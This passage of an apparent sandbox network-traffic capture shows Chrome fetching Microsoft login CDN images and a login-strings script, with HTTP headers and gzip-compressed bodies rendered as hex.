2024-08-31 22:54:41 UTC	263	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e5 53 c9 6e c3 20 10 fd 15 44 af 2c 43 4d c0 ae c0 52 7a cf 0f f4 66 29 ae 8d e4 2c 2a 28 e4 f3 0b d8 95 1a d5 be f4 d2 43 59 9e 86 19 86 79 6f 24 8c bf 0d e8 7e 9a ce de e2 31 84 eb 0b e7 31 46 16 2b 76 f9 18 f8 33 00 f0 74 03 a3 e8 8e 61 b4 58 28 8c c6 de 0d 63 98 ed 9b eb e3 eb e5 6e 31 20 40 42 a5 85 5b 13 5c 98 fa b6 f3 be 0f de f0 f9 64 ae 5d 18 d1 bb 9b 26 8b 9f 74 19 18 1d 2d 3e 08 26 64 45 14 ab 77 ba 4b 36 68 32 23 a4 29 08 93 52 31 a8 9b ec 54 72 c1 25 a4 40 e7 5d 9c 62 c1 39 04 84 d5 4d f5 33 87 7e cf 79 ac 44 bf 2a ed 57 48 68 d2 30 d8 c9 6e fd 41 ba c5 82 66 16 fb 15 e6 3a e9 6d a4 da d0 4b 33 8d 43 fd 17 3d 79 cc 29 fc b3 f1 0b d9 1b e4 4a d2 4a 8b 17 b5 a7 82 04 fe 89 6a 21 8b dc 22 fa 0d f3 d6 e4 bf d6 7e 02 Data Ascii: Sn D,CMRzf),(CYyo$~11F+v3taX(cn1 @B[\d]&t->&dEwK6h2#)R1Tr%@]b9M3~yDWHh0nAf:mK3C=y)JJj!"~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49751	13.107.246.73	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	620	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:41 UTC	814	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:07 GMT ETag: 0x8D79ED359808AB6 x-ms-request-id: 12ede69a-201e-000d-66f5-fa342f000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-16579567576w5bqfyu10zdac7g000000056g00000000mc0v x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:41 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49750	13.107.246.73	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	614	OUT	GET /shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:41 UTC	813	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: image/svg+xml Content-Length: 252 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:06 GMT ETag: 0x8D79ED3593AC274 x-ms-request-id: 87971542-901e-006a-44f5-fa24d3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-165795675767hwjqv3v00bvq3400000005m000000000b9rr x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:41 UTC	252	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e5 53 cb aa c3 20 10 fd 15 71 ed 63 6c ac 26 c5 04 da 7d 7f e0 ee 02 0d 31 d0 17 55 6a 3f bf 6a 52 b8 e5 26 9b bb e9 a2 a8 87 d1 f1 38 e7 0c 68 dc bd 47 8f d3 f1 ec 6a 6c bd bf 6e 38 0f 21 b0 50 b0 cb ad e7 2b 00 e0 f1 06 46 61 38 78 5b 63 a1 30 b2 dd d0 5b 3f c6 f7 a1 0b bb cb a3 c6 80 00 09 15 27 6e 8c 1f fc b1 6b 5a e7 3a ef 0c 1f 77 e6 da 7a 8b 0e 35 de 0b 26 64 41 14 2b d7 ba 8d 31 68 32 22 c4 21 08 93 52 31 28 ab 74 a8 e4 84 53 4a 81 4e 2b 1f 8a 09 c7 14 10 56 56 c5 5f 0e fd cd 79 af 44 5f 95 b6 33 22 34 a9 18 ac 65 3b ff 20 5d 52 41 93 8a ed 8c 72 1d fd 56 52 2d f8 a5 49 c6 be fc 44 4f de 39 59 7f 0a fe 61 7b 41 5c 26 cd b4 78 72 7b ca 48 e0 4b 5c 0b 99 ed 66 d3 3f 98 37 26 7d ae e6 09 a7 d4 d5 8c 84 03 00 00 Data Ascii: S qcl&}1Uj?jR&8hGjln8!P+Fa8x[c0[?'nkZ:wz5&dA+1h2"!R1(tSJN+VV_yD_3"4e; ]RArVR-IDO9Ya{A\&xr{HK\f?7&}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49749	13.107.246.73	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	619	OUT	GET /shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:41 UTC	813	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: image/svg+xml Content-Length: 263 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:06 GMT ETag: 0x8D79ED359401A9D x-ms-request-id: 954d6a61-401e-000b-4af5-fa0790000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-16579567576pg4fvvmc18u0v4g00000005f000000000su5c x-fd-int-roxy-purgeid: 67912908 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:41 UTC	263	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e5 53 c9 6e c3 20 10 fd 15 44 af 2c 43 4d c0 ae c0 52 7a cf 0f f4 66 29 ae 8d e4 2c 2a 28 e4 f3 0b d8 95 1a d5 be f4 d2 43 59 9e 86 19 86 79 6f 24 8c bf 0d e8 7e 9a ce de e2 31 84 eb 0b e7 31 46 16 2b 76 f9 18 f8 33 00 f0 74 03 a3 e8 8e 61 b4 58 28 8c c6 de 0d 63 98 ed 9b eb e3 eb e5 6e 31 20 40 42 a5 85 5b 13 5c 98 fa b6 f3 be 0f de f0 f9 64 ae 5d 18 d1 bb 9b 26 8b 9f 74 19 18 1d 2d 3e 08 26 64 45 14 ab 77 ba 4b 36 68 32 23 a4 29 08 93 52 31 a8 9b ec 54 72 c1 25 a4 40 e7 5d 9c 62 c1 39 04 84 d5 4d f5 33 87 7e cf 79 ac 44 bf 2a ed 57 48 68 d2 30 d8 c9 6e fd 41 ba c5 82 66 16 fb 15 e6 3a e9 6d a4 da d0 4b 33 8d 43 fd 17 3d 79 cc 29 fc b3 f1 0b d9 1b e4 4a d2 4a 8b 17 b5 a7 82 04 fe 89 6a 21 8b dc 22 fa 0d f3 d6 e4 bf d6 7e 02 Data Ascii: Sn D,CMRzf),(CYyo$~11F+v3taX(cn1 @B[\d]&t->&dEwK6h2#)R1Tr%@]b9M3~yDWHh0nAf:mK3C=y)JJj!"~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49747	13.107.246.44	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	719	OUT	GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_yruqtyo0qslo70l4a-_ung2.js HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Purpose: prefetch Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:41 UTC	819	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: application/x-javascript Content-Length: 11322 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Aug 2020 03:03:49 GMT ETag: 0x8D83E6C5642CD2B x-ms-request-id: b0efd90c-601e-007e-09f5-fa6cbc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-165795675767jvm9z21nmtw4wn00000005d0000000003u5q x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-08-31 22:54:41 UTC	11322	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dd 7d cb 76 1b 49 96 d8 de 5f 91 8d f6 69 89 53 29 14 1e 7c 42 85 92 41 00 94 30 02 01 14 00 8a 55 a7 aa 8c 93 44 06 c8 6c 01 99 70 66 42 14 9a cd 39 b3 9b 85 17 5e 7b e7 85 57 5e 7a e3 bd 3f 65 ce 19 7f 87 ef 23 22 32 f2 01 90 aa ea ee 9a 19 2d 28 20 1e 37 6e dc b8 71 5f 71 23 f0 bb c5 c6 9f c7 5e e0 bf 14 07 0f ea b3 15 bc f4 0f 1e bc c5 4b ef 47 ff e7 83 50 c4 9b d0 b7 f0 73 59 7c 5e 07 61 1c bd fe e4 84 56 dc c4 a2 e6 83 2c 6b 3c 3c da 9e db f0 ed 65 e0 b8 c2 6d fc ae fa f8 5a 76 15 d8 75 ee 2c 97 2f 63 05 c1 8e ed e4 73 70 00 5f b8 5b f3 77 95 a4 e2 11 87 f1 9a 0f 1a 50 50 5e 35 85 1d 94 e7 4d 0f fe ae 9b a5 92 1d bc ac 1c 3c be fc 31 99 86 1d d8 1e 20 ff b2 76 40 58 fa 4d ef 65 15 e0 c3 7f 47 07 76 08 ff 9d 1c d8 4e 33 Data Ascii: }vI_iS)\|BA0UDlpfB9^{W^z?e#"2-( 7nq_q#^KGPsY\|^aV,k<<emZvu,/csp_[wPP^5M<1 v@XMeGvN3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49752	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	417	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:42 UTC	799	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:41 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT ETag: 0x8D7B0071D86E386 x-ms-request-id: 0fc53578-d01e-0078-05f5-fa60ae000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225441Z-16579567576rt7gkm43y59pk3800000005eg000000006htn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:42 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49753	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:41 UTC	418	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:42 UTC	800	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:42 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT ETag: 0x8D79B8373CB2849 x-ms-request-id: bbfc3873-c01e-0048-568d-f9e1cc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225442Z-16579567576txfkctmnqv2e9c4000000058g0000000082c2 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:42 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49754	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:42 UTC	412	OUT	GET /shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:42 UTC	799	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:42 GMT Content-Type: image/svg+xml Content-Length: 252 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:37 GMT ETag: 0x8D79B83739D7D79 x-ms-request-id: 19d6d938-f01e-0053-38f5-fadfcf000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225442Z-16579567576gnfmq2acf56mm7000000005dg000000008yd1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:42 UTC	252	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e5 53 cb aa c3 20 10 fd 15 71 ed 63 6c ac 26 c5 04 da 7d 7f e0 ee 02 0d 31 d0 17 55 6a 3f bf 6a 52 b8 e5 26 9b bb e9 a2 a8 87 d1 f1 38 e7 0c 68 dc bd 47 8f d3 f1 ec 6a 6c bd bf 6e 38 0f 21 b0 50 b0 cb ad e7 2b 00 e0 f1 06 46 61 38 78 5b 63 a1 30 b2 dd d0 5b 3f c6 f7 a1 0b bb cb a3 c6 80 00 09 15 27 6e 8c 1f fc b1 6b 5a e7 3a ef 0c 1f 77 e6 da 7a 8b 0e 35 de 0b 26 64 41 14 2b d7 ba 8d 31 68 32 22 c4 21 08 93 52 31 28 ab 74 a8 e4 84 53 4a 81 4e 2b 1f 8a 09 c7 14 10 56 56 c5 5f 0e fd cd 79 af 44 5f 95 b6 33 22 34 a9 18 ac 65 3b ff 20 5d 52 41 93 8a ed 8c 72 1d fd 56 52 2d f8 a5 49 c6 be fc 44 4f de 39 59 7f 0a fe 61 7b 41 5c 26 cd b4 78 72 7b ca 48 e0 4b 5c 0b 99 ed 66 d3 3f 98 37 26 7d ae e6 09 a7 d4 d5 8c 84 03 00 00 Data Ascii: S qcl&}1Uj?jR&8hGjln8!P+Fa8x[c0[?'nkZ:wz5&dA+1h2"!R1(tSJN+VV_yD_3"4e; ]RArVR-IDO9Ya{A\&xr{HK\f?7&}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49755	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:42 UTC	417	OUT	GET /shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:42 UTC	799	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:42 GMT Content-Type: image/svg+xml Content-Length: 263 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:37 GMT ETag: 0x8D79B83737D1C56 x-ms-request-id: 0e0acc6e-901e-0008-4ff5-fae6f4000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225442Z-16579567576l4p9bs8an1npq1n00000005ag0000000086uy x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:54:42 UTC	263	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e5 53 c9 6e c3 20 10 fd 15 44 af 2c 43 4d c0 ae c0 52 7a cf 0f f4 66 29 ae 8d e4 2c 2a 28 e4 f3 0b d8 95 1a d5 be f4 d2 43 59 9e 86 19 86 79 6f 24 8c bf 0d e8 7e 9a ce de e2 31 84 eb 0b e7 31 46 16 2b 76 f9 18 f8 33 00 f0 74 03 a3 e8 8e 61 b4 58 28 8c c6 de 0d 63 98 ed 9b eb e3 eb e5 6e 31 20 40 42 a5 85 5b 13 5c 98 fa b6 f3 be 0f de f0 f9 64 ae 5d 18 d1 bb 9b 26 8b 9f 74 19 18 1d 2d 3e 08 26 64 45 14 ab 77 ba 4b 36 68 32 23 a4 29 08 93 52 31 a8 9b ec 54 72 c1 25 a4 40 e7 5d 9c 62 c1 39 04 84 d5 4d f5 33 87 7e cf 79 ac 44 bf 2a ed 57 48 68 d2 30 d8 c9 6e fd 41 ba c5 82 66 16 fb 15 e6 3a e9 6d a4 da d0 4b 33 8d 43 fd 17 3d 79 cc 29 fc b3 f1 0b d9 1b e4 4a d2 4a 8b 17 b5 a7 82 04 fe 89 6a 21 8b dc 22 fa 0d f3 d6 e4 bf d6 7e 02 Data Ascii: Sn D,CMRzf),(CYyo$~11F+v3taX(cn1 @B[\d]&t->&dEwK6h2#)R1Tr%@]b9M3~yDWHh0nAf:mK3C=y)JJj!"~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49756	13.107.246.42	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:42 UTC	414	OUT	GET /shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:42 UTC	785	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:42 GMT Content-Type: image/svg+xml Content-Length: 252 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:06 GMT ETag: 0x8D79ED3593AC274 x-ms-request-id: 87971542-901e-006a-44f5-fa24d3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225442Z-165795675767hwjqv3v00bvq3400000005pg0000000058w3 x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_HIT Accept-Ranges: bytes
